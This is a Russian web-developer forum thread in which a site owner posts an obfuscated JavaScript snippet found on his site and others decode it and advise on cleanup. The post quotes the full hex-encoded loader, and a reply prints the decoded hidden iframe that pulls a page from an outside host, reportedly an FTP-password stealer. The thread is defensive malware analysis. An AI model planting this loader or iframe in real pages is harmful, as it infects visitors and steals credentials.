Форум Сайтостроение Веб-строительство

Вопрос вирусологам

12
Master812
На сайте с 23.12.2007
Offline
168
Master812
1484

Народ, подскажите, пожалуйста, что это: вирус или троян? Если троян, то на какой адрес он посылает информацию?

Какой алгоритм его действия?

Вредоносный скрипт:

<script>function v47a4f475a4e08(v47a4f475a55d5){ var v47a4f475a5da5=16; return(parseInt(v47a4f475a55d5,v47a4f475a5da5));}function v47a4f475a6d44(v47a4f475a7514){ var v47a4f475a8c82=2; var v47a4f475a7ce3='';for(v47a4f475a84b3=0; v47a4f475a84b3<v47a4f475a7514.length; v47a4f475a84b3+=v47a4f475a8c82){ v47a4f475a7ce3+=(String.fromCharCode(v47a4f475a4e08(v47a4f475a7514.substr(v47a4f475a84b3, v47a4f475a8c82))));}return v47a4f475a7ce3;} document.write(v47a4f475a6d44('3C696672616D65206E616D653D276438393436633927207372633D27687474703A2F2F7468656C6F62616E6F66662E636F6D2F6D7973686F702F746573742F696E6465782E706870272077696474683D373939206865696768743D333531207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

raspberry pi сайт ( https://4raspberrypi.ru/ ) и orange pi сайт ( https://orangepi.su/ ) и новостной движок ( https://generalscript.ru/ )
DyaDya
На сайте с 11.04.2007
Offline
147
DyaDya
#1

не факт, что это вообще вирус или троян, это антивирь вам скажет.

Скорее всего это просто закодированный код javascript, например, с дора, спрятанный редирект ;))

В принципе можно раскодировать, но пока лень, нужно минут 20 повозиться. Подобное уже раскодировал...

----

... Раскодировал, достаточно оказалось 3 минут... ифрейм, подгружается с сайта (thelobanoff_com), может и правда троянчик... ссылку точную не даю, ибо найдутся ламеры, которые полезут... нафиг надо.

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
Master812
На сайте с 23.12.2007
Offline
168
Master812
#2

Кто скажет мне что это за хрень и на какие адреса она скидывала мои пароли, тот получит приз!!!

В качестве приза - скрипт поисковика, который ищет по базе google и выдаёт результаты поиска на ваш сайт! Пример тут http://www.coolnarod.ru/info/poisk.htm

M
На сайте с 06.02.2008
Offline
0
mmvds
#3

Скрипт просто с кучей мусора, длинными названиями, все это чтобы скрыть всего одну строчку:

<iframe name='d8946c9' src='http://thelobanoff.com/myshop/test/index.p&#65533;p' width=799 height=351 style='display:none'></iframe>

Строчка закодена номерами ASCII символов в 16-ичном коде.

Очевидно, грузит в iframe скрипт "http://thelobanoff.com/myshop/test/index.p&#65533;p"

DyaDya
На сайте с 11.04.2007
Offline
147
DyaDya
#4
mmvds:
Скрипт просто с кучей мусора, длинными названиями, все это чтобы скрыть всего одну строчку:

Строчка закодена номерами ASCII символов в 16-ичном коде.
Очевидно, грузит в iframe скрипт "http://thelobanoff.com/myshop/test/index.p&#65533;p"

я её уже видел ;), в конце php

ТС, поставьте себе антивирь и на всяк случай еще и AVZ! Я заметил вы уже не первый раз от троянчиков страдаете.

R
На сайте с 28.01.2006
Offline
95
radist
#5
Master812:
Кто скажет мне что это за хрень и на какие адреса она скидывала мои пароли, тот получит приз!!!
В качестве приза - скрипт поисковика, который ищет по базе google и выдаёт результаты поиска на ваш сайт! Пример тут http://www.coolnarod.ru/info/poisk.htm

Не парься это старый вирус. Он скидывает только пароли ftp.

Удали вирус с компа, и смени пароли ftp для всех сайтов.

Куда он скидывает хрен занет, по этой ссылки он загружает к тебе на комп прогу, через дырявый explorer.

Меняюсь тематическими ссылками с следующими тематиками: Компьютеры, Связь, Hardware, Системы безопасности! Монтаж кондиционеров (http://www.coldfresh.ru)!
Reg.ru нашел вирус, я Яндекс.Поиск о скрытых спам-ссылках Резкий всплеск прямых заходов.
Brand from Amber
На сайте с 18.08.2007
Offline
293
Brand from Amber
#6

Master812, Для разгадывания подобных ребусов есть удобная утилитка (под win23 платформу) - http://www.yandex.ru/yandsearch?text=download+shtirlitz&rpt=rad

Лучший способ понять что-то самому - объяснить это другому.
dayw
На сайте с 25.01.2006
Offline
116
dayw
#7

Мало этой темы: /ru/forum/203466 ?

лечитесь... от вирусов, а Вы все разговоры ведете.

Интернет-магазин игровых приставок в Москве (https://savelagame.ru)
D
На сайте с 14.01.2007
Offline
153
Dinozavr
#8
Brand from Amber:
Master812, Для разгадывания подобных ребусов есть удобная утилитка

для разгадывания подобных ребусов достаточно заменить document.write на alert ;)

Progr@mmer\.
На сайте с 14.10.2007
Offline
44
Progr@mmer\.
#9

Master812, DyaDya, radist, кто-нибудь из вас знает из какой программы (ftp-клиента) такие вирусы таскают пароли?

А то я поймал (вроде бы) как-то одного, так не знаю стащил ли он у меня пасы или нет...

Вашей девушке не хватает романтики? Черпните её на сайте «Я Люблю Романтику» (http://iloveromantics.ru/). Романтический форум (http://forum.iloveromantics.ru/) для отдыха от нудной работы.
DI
На сайте с 03.01.2007
Offline
123
DenIT
#10

чаще всего Windows/Total Commander

Высказывание идиотского утверждения требует на порядок меньше усилий, чем его последовательное и обоснованное опровержение и более того, иногда это опровержение вообще невозможно. © (http://zhurnal.lib.ru/s/shapiro_m_a/raspidiota.shtml)
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий